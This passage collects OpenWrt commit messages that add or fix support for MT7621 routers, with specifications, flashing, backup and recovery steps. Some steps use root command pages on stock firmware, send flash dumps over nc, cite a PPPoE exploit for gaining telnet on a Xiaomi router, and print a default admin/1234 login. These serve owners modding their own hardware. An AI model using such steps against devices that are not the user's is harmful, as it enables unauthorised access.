This patch adds support for D-Link DIR-2660 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white), USB 2.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[rebase onto already merged DIR-1960 A1, add MAC addresses to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for Wavlink WL-WN531A6 (Quantum D6).
Specifications:
--------------
* SoC: Mediatek MT7621AT 2C2T, 880MHz
* RAM: 128MB DDR3, Nanya NT5CB64M16GP-EK
* Flash: 16MB SPI NOR flash, GigaDevice GD25Q127CSIG
* WiFi 5GHz: Mediatek MT7615N (4x4:4) on mini PCIE slot.
* WiFi 2.4GHz: Mediatek MT7603EN (2x2:2) on mini PCIE slot.
* Ethernet: MT7630, 5x 1000Base-T
* LED: Power, WAN, LAN(x4), WiFi, WPS, dual color
"WAVLINK" LED logo on the top cover.
* Buttons: Reset, WPS, "Turbo", touch button on the top
cover via RH6015C touch sensor.
* UART: UART1: serial console (57600 8n1) on the J4 header
located below the top heatsink.
UART2: J12 header, located on the right side of
the board.
* USB: One USB3 port.
* I2C: J9 header, located below the top heatsink.
Backup the OEM Firmware:
-----------------------
There isn't any firmware released for the WL-WN531A6 on
the Wavlink web site. Reverting back to the OEM firmware is
not possible unless we have a backup of the original OEM
firmware.
The OEM firmware is stored on /dev/mtd4 ("Kernel").
1) Plug a FAT32 formatted USB flash drive into the USB port.
2) Navigate to "Setup->USB Storage". Under the "Available
Network folder" you can see part of the mount point of
the newly mounted flash drive filesystem - e.g "sda1".
The full mount point is prefixed with "/media", so in
this case the mount point becomes "/media/sda1".
3) Go to http://192.168.10.1/webcmd.shtml .
4) Type the following line in the "Command" input box:
dd if=/dev/mtd4ro of=/media/sda1/firmware.bin
5) Click "Apply"
6) After few seconds, in the text area should appear this
output:
30080+0 records in
30080+0 records out
7) Type "sync" in the "Command" input box and click "Apply".
8) At this point the OEM firmware is stored on the flash
drive as "firmware.bin". The size of the file is 15040 KB.
Installation:
------------
* Flashing instructions (OEM web interface):
The OEM web interface accepts only files with names containing
"WN531A6". It's also impossible to flash the *-sysupgrade.bin
image, so we have to flash the *-initramfs-kernel.bin first and
use the OpenWrt's upgrade interface to write the sysupgrade
image.
1) Rename openwrt-ramips-mt7621-wavlink_wl-wn531a6-initramfs-kernel.bin
to WN531A6.bin.
2) Connect your computer to the one of the LAN ports of the
router with an Ethernet cable and open http://192.168.10.1
3) Browse to Setup -> Firmware Upgrade interface.
4) Upload the (renamed) OpenWrt image - WN531A6.bin.
5) Proceed with the firmware installation and give the device
a few minutes to finish and reboot.
6) After reboot wait for the "WAVLINK" logo on the top cover
to turn solid blue, and open http://192.168.1.1
7) Use the OpenWrt's "Flash Firmware" interface to write the
OpenWrt sysupgrade image:
openwrt-ramips-mt7621-wavlink_wl-wn531a6-squashfs-sysupgrade.bin
* Flashing instructions (u-boot TFTP):
1) Configure a TFTP server on your computer and set its IP
to 192.168.10.100
2) Rename the OpenWrt sysupgrade image to firmware.bin and
place it in the root folder of the TFTP server.
3) Power off the device and connect an Ethernet cable from
one of its LAN ports your computer.
4) Press the "Reset" button (and keep it pressed)
5) Power on the device.
6) After a few seconds, when the connected port LAN LED stops
blinking fast, release the "Reset" button.
7) Flashing OpenWrt takes less than a minute, system will
reboot automatically.
8) After reboot the WAVLINK logo on the top cover will indicate
the current OpenWrt running status (wait until the logo tunrs
solid blue).
Revert to the OEM Firmware:
--------------------------
* U-boot TFTP:
Follow "Flashing instructions (u-boot TFTP)" and use the
"firmware.bin" backup image.
* OpenWrt "Flash Firmware" interface:
Upload the "firmware.bin" backup image and select "Force update"
before continuing.
Notes:
-----
* The MAC address shown on the label at the back of the device
is assigned to the 2.4G WiFi adapter.
MAC addresses assigned by the OEM firmware:
2.4G: *:XX (label): factory@0x0004
5G: *:XX + 1 : factory@0x8004
WAN: *:XX - 1 : factory@0xe006
LAN: *:XX - 2 : factory@0xe000
* The I2C bus and UART2 are fully functional. The headers are
not populated.
Signed-off-by: Georgi Vlaev <georgi.vlaev@konsulko.com>
The leds block was copied over from the RT-AC85P DTS to the common
DTSI while keeping the device-specific model name in the label.
This moves the LEDs back to the DTS files and adjusts the names to
properly resemble the model name of the devices used at, just like
it is handled on most other devices.
Fixes: 7c5f712e4fec ("ramips: add support for Asus RT-AC65P")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for the MikroTik RouterBOARD 760iGS router.
It is similar to the already supported RouterBOARD 750Gr3.
The 760iGS device features an added SFP cage, and passive
PoE out on port 5 compared to the RB750Gr3.
https://mikrotik.com/product/hex_s
Specifications:
- SoC: MediaTek MT7621A
- CPU: 880MHz
- Flash: 16 MB
- RAM: 256 MB
- Ethernet: 5x 10/100/1000 Mbps
- SFP cage
- USB port
- microSD slot
Unsupported:
- Beeper (requires PWM driver)
- ZT2046Q (ADS7846 compatible) on SPI as slave 1 (CS1)
The linux driver requires an interrupt, and pendown GPIO
These are unknown, and not needed with the touchscreen
only used for temperature and voltage monitoring.
ads7846 hwmon:
temp0 is degrees Celsius
temp1 is voltage * 32
GPIOs:
- 07: input passive PoE out (lan5) compatible (Mikrotik) device connected
- 17: output passive PoE out (lan5) switch
Installation through RouterBoot follows the usual MikroTik method
https://openwrt.org/toh/mikrotik/common
To boot to intramfs image in RAM:
1. Setup TFTP server to serve intramfs image.
2. Plug Ethernet cable into WAN port.
3. Unplug power, hold reset button and plug power in.
Wait (~25 seconds) for beep and then release reset button.
The SFP LED will be lit in RouterBoot, but will not be lit in OpenWRT.
4. Wait for a minute. Router should be running OpenWrt,
check by plugging in to port 2-5 and going to 192.168.1.1.
To install OpenWrt to flash:
1. Follow steps above to boot intramfs image in RAM.
2. Flash the sysupgrade.bin image with web interface or sysupgrade.
3. Once the router reboots you will be running OpenWrt from flash.
OEM firmware differences:
- RouterOS assigns a different MAC address for each port
- The first address (E01 on the sticker) is used for wan (ether1 in OEM).
- The next address is used for lan2.
- The last address (E06 on the sticker) is used for sfp.
[Initial port work, shared dtsi]
Signed-off-by: Vince Grassia <vincenzo.grassia@zionark.com>
[SFP support and GPIO identification]
Signed-off-by: Luka Logar <luka.logar@iname.com>
[Misc. fixes and submission]
Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au>
[rebase, drop uart3 from state_default on 750gr3, minor commit
title/message facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This implements the newly introduced compat-version to prevent
broken upgrade between swconfig and DSA for ramips' mt7621 subtarget.
In order to make the situation more transparent for the user, and
to prevent large switch-cases for devices, it is more convenient to
have the entire subtarget 1.1-by-default. This means that new devices
will be added with 1.1 from the start, but in contrast we don't need
to switch them in board.d files. Apart from that, users that manually
backport devices to 19.07 with swconfig will have an equivalent
upgrade experience to officially supported devices.
Since DSA support on mt7621 is out for a while already, this applies
the same uci-defaults workaround for early adopters as already
done for kirkwood and mvebu in previous commits.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-1960 A1. Given the similarity with
the DIR-1760/2660 A1, this patch also introduces a common DTSI which can
be shared with these devices, with support to be added in future commits.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:EB (label)
wan factory 0xe006 *:EE
2.4 factory 0xe000 +1 *:EC
5.0 factory 0xe000 +2 *:ED
Seems like vendor didn't replace the dummy entrys in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[fix whitespace issues, create patch to merge DIR-1960 first, move
special WiFi MAC settings to DTS, extend commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This 750gr3 GPIO17 switch was added based on vendor source,
but only the 760iGS (which shares the rbsysfs board identifier)
device has the physical wiring. The 750Gr3 actually does not
support PoE out.
Apart from that, note that the gpio base (480) would have required
this GPIO to be referenced as 497 if it was kept.
Fixes: 6ba58b7b020c ("ramips: cleanup the RB750Gr3 support")
Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au>
[commit title/message facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet
ports. Even if mine is branded as "Gemeita AC2100", the sticker on the
back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6.
Probably the real product name is the Wavlink WL-WN583A6 because of
the many references to Wavlink in the OEM firmware and bootlog.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 8MB NOR (GigaDevice GD25Q64B)
ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7603E (2x2:2)
- 5GHz: 1x MT7615E (4x4:4)
- 6 internal antennas
BTN:
- 1x Reset button
- 1x WPS button
- 1x ON/OFF switch (working but unmodifiable)
- 1x Auto/Schedule switch (working but unmodifiable. Read Note #3)
LEDS:
- 1x White led
- 1x Red led
- 1x Amber led
- 1x Blue led
- 2x Blue leds (lan and wan port status: working but unmodifiable)
UART:
- 57600-8-N-1
Everything works correctly.
Currently there is no firmware update available. Because of this, in
order to restore the OEM firmware, you must firstly dump the OEM
firmware from your router before you flash the OpenWrt image.
Backup the OEM Firmware
-----------------------
The following steps are to be intended for users having little to none
experience in linux. Obviously there are many ways to backup the OEM
firmware, but probably this is the easiest way for this router.
Procedure tested on M83A6.V5030.191210 firmware version.
1) Go to http://192.168.10.1/webcmd.shtml
2) Type the following line in the "Command" input box:
mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done
3) Click "Apply"
4) After few seconds, in the textarea should appear this output:
16384+0 records in
16384+0 records out
8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s
384+0 records in
384+0 records out
196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s
15744+0 records in
15744+0 records out
8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s
dd: can't open '/dev/mtd5ro': No such device
dd: can't open '/dev/mtd6ro': No such device
dd: can't open '/dev/mtd7ro': No such device
Excluding the "X.XXXXXX seconds" part, you should get the same
exact output. If your output doesn't match mine, stop reading
and ask for help in the forum.
5) Open the following links to download the partitions of the OEM FW:
http://192.168.10.1/dev/mtd0rohttp://192.168.10.1/dev/mtd1rohttp://192.168.10.1/dev/mtd2rohttp://192.168.10.1/dev/mtd3rohttp://192.168.10.1/dev/mtd4ro
If one (or more) of these files weight 0 byte, stop reading and ask
for help in the forum.
6) Store these downloaded files in a safe place.
7) Reboot your router to remove any temporary file from your router.
Installation
------------
Flash the initramfs image in the OEM firmware interface.
When openwrt boots, flash the sysupgrade image otherwise you won't be
able to keep configuration between reboots.
Restore OEM Firmware
--------------------
Flash the "mtd4ro" file you previously backed-up directly from LUCI.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Notes
-----
1) The "System Command" page allows to run every command as root.
For example you can use "dd" and "nc" to backup the OEM firmware.
PC (SERVER):
nc -l 5555 > ./mtdXro
ROUTER (CLIENT):
dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555
2) The OEM web interface accepts only images containing the string
"WN583A6" in the filename.
Currently the OEM interface accepts only the initramfs image
probably because it checks if the ih_size in the image header is
equal to the whole image size (instead of the kernel size)
Read more here:
https://forum.openwrt.org/t/support-for-strong-1200/22768/19
3) The white led (namely "Smart Night Light") can be controller by the
user only if the side switch is set to "Schedule" otherwise it will
be activated by the light condition (there is a photodiode on the
top side of the router)
4) Router mac addresses:
LAN XX:XX:XX:XX:XX:8F
WAN XX:XX:XX:XX:XX:90
WIFI 2G XX:XX:XX:XX:XX:91
WIFI 5G XX:XX:XX:XX:XX:92
LABEL XX:XX:XX:XX:XX:91
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[remove chosen node, fix whitespace]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The function name ucidef_set_interface_lan_wan does not exist,
use the proper name by adding an "s" and thereby fix network
setup on these devices.
Fixes: 22468cc40c8b (ramips: erx and erx-sfp: fix missing WAN interface)
Signed-off-by: Nelson Cai <niphor@gmail.com>
[commit message/title facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-867 A1 and D-Link DIR-882 A1. Given
the similarity of these devices, this patch also introduces a common DTS
shared between DIR-867 A1, DIR-878 A1 and DIR-882 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 128 MB (DDR3)
* Flash: 16 MB (SPI NOR)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WiFi Toggle, WPS
* LEDs: Power (green/orange), Internet (green/orange), WiFi 2.4G (green),
WiFi 5G (green), USB 2.0 (green), USB 3.0 (green)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
* DIR-867 wireless chips are limited to 3x3 streams at hardware level
* USB ports and related LEDs available only on DIR-882
Serial port:
* Parameters: 57600, 8N1
* Location: J1 header (close to the Reset, WiFi and WPS buttons)
* Pinout: 1 - VCC
2 - RXD
3 - TXD
4 - GND
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
Signed-off-by: Mateus B. Cassiano <mbc07@live.com>
[move DEVICE_VARIANT to individual definitions]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
SoC: MT7621AT
RAM: 128MB
Flash: 16MB NOR SPI flash
WiFi: MT7615N (2.4GHz) and MT7615N (5Ghz)
LAN: 5x1000M
Firmware layout is Uboot with extra 96 bytes in header
Base PCB is AP-MTKH7-0002
LEDs Power Green,Power Orange,Internet Green,Internet Orange
LEDs "2.4G" Green & "5G" Green connected directly to wifi module
Buttons Reset,WPS,WIFI
Flashing instructions:
Upload image via emergency recovery mode
Push and hold reset button (on the back of the device) until power led
starts flashing (about 10 secs or so) while powering the device on.
Give it ~30 seconds, to boot the recovery mode GUI
Connect your client computer to LAN1 of the device
Set your client IP address manually to 192.168.0.2 / 255.255.255.0.
Call the recovery page for the device at http://192.168.0.1
Use the provided emergency web GUI to upload and flash a new firmware to
the device. Some browsers/OS combinations are known not to work, so if
you don't see the percentage complete displayed and moving within a few
seconds, restart the procedure from scratch and try anoher one,
or try the command line way.
Alternative method using command line on Linux:
curl -v -i -F "firmware=@openwrt-xxxx-squashfs-factory.bin" 192.168.0.1
Signed-off-by: Mathieu Martin-Borret <mathieu.mb@protonmail.com>
[use of generic uimage-padhdr in image generation code]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The current one only looks for mt76x2e and mt7603e, and
does not work for 2 or more same Wi-Fi chips.
Refactor the script to cover those cases.
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXELs zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not avaible for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 16MB NOR (Macronix MX25L12805D)
ETH: 1x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615 (4x4:4)
- 5GHz: 1x MT7615 (4x4:4)
- 4 antennas: 2 external detachable and 2 internal
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x Green led (Power)
- 1x Green-Amber-Red led (Wifi)
UART:
- 57600-8-N-1
Everything works correctly.
Installation
------------
Flash the factory image directly from OEM web interface.
(You can login using these credentials: admin/1234)
Restore OEM Firmware
--------------------
Flash the OEM "bin" firmware directly from LUCI.
The firmware is downloadable from the OEM web page.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Restoring procedure tested with RE23_1.08.bin
MAC addresses
-------------
factory 0x4 *:24
factory 0x8004 *:25
Cimage 0x07 *:24
Cimage 0x0D *:24
Cimage 0x13 *:24
Cimage 0x19 *:25
No other addresses were found in factory partition.
Since the label contains both the 2.4GHz and 5GHz mac address I decided
to set the 5GHz one as label-mac-device. Moreover it also corresponds
to the lan mac address.
Notes
-----
The wifi led in the OEM firmware changes colour depending on the signal
strength. This can be done in OpenWrt but just for one interface.
So for now will not be any default action for this led.
If you want to open the case, pay attention to the antenna placed on
the bottom part of the front cover.
The wire is a bit short and it breaks easily. (I broke it)
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[fix two typos and add extended MAC address section to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This moves WiFi LED triggers from 01_leds to device tree.
While at it, convert the labels there to lower case; this is
more commonly used and the change will actually remove competition
between DT trigger and leftover uci config on already installed
systems.
Suggested-by: Georgi Vlaev <georgi.vlaev@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device uses the same hardware as RE650 v1 which got supported in
8c51dde.
Hardware specification:
- SoC 880 MHz - MediaTek MT7621AT
- 128 MB of DDR3 RAM
- 16 MB - Winbond 25Q128FVSG
- 4T4R 2.4 GHz - MediaTek MT7615E
- 4T4R 5 GHz - MediaTek MT7615E
- 1x 1 Gbps Ethernet - MT7621AT integrated
- 7x LEDs (Power, 2G, 5G, WPS(x2), Lan(x2))
- 4x buttons (Reset, Power, WPS, LED)
- UART header (J1) - 2:GND, 3:RX, 4:TX
Serial console @ 57600,8n1
Flash instructions:
Upload
openwrt-ramips-mt7621-tplink_re500-v1-squashfs-factory.bin
from the RE500 web interface.
TFTP recovery to stock firmware:
Unfortunately, I can't find an easy way to recover the RE
without opening the device and using modified binaries. The
TFTP upload will only work if selected from u-boot, which
means you have to open the device and attach to the serial
console. The TFTP update procedure does *not* accept the
published vendor firmware binaries. However, it allows to
flash kernel + rootfs binaries, and this works if you have
a backup of the original contents of the flash. It's probably
possible to create special image out of the vendor binaries
and use that as recovery image.
Signed-off-by: Christoph Krapp <achterin@googlemail.com>
[remove dts-v1 in DTSI, do not touch WiFi LEDs for RE650, keep
state_default in DTS files, fix label-mac-device, use lower case
for WiFi LEDs]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This drops the shebang from all target files for /lib and
/etc/uci-defaults folders, as these are sourced and the shebang
is useless.
While at it, fix the executable flag on a few of these files.
This does not touch ar71xx, as this target is just used for
backporting now and applying cosmetic changes would just complicate
things.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The uci config section network.globals set up in /bin/config_generate
will only be created if /proc/sys/net/ipv6 exists.
Correspondingly, lacking IPv6 support, the command
uci set network.globals.packet_steering=1
will fail with "uci: Invalid argument" as the network.globals config
has not been set up.
Fix that by adding the setup there as well.
Fixes: dfd62e575c6c ("ramips: enable packet steering by default on mt7621")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Since 01_enable_packet_steering only touches the network config,
limit the uci commit to this as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This partially reverts commit 5acd1ed0be0d ("ramips: mt7621: fix
Ubiquiti ER-X ports names and MAC addresses"), this change was discussed
in https://github.com/openwrt/openwrt/pull/2901#discussion_r407238452
With commit 5acd1ed0be0d ("ramips: mt7621: fix Ubiquiti ER-X ports names
and MAC addresses"), all the ports were put into the LAN bridge, with
the argument that the OEM firmware does not have a WAN port enabled. In
the default OEM setup, all of the ports except eth0 are dead and eth0 is
set to a static IP address without providing DHCP services when
connected. It is only after the wizard has been run that eth0 becomes
the WAN port and all the rest of the ports belong to LAN with DHCP
enabled.
Having all of the ports set to the LAN bridge does not mirror the default
OEM setup. To accomplish that, then only eth0 would be in the LAN bridge.
But this is not the expected behaviour of OpenWrt.
Therefore this proposal to set eth0 to WAN and eth1-N to LAN provides
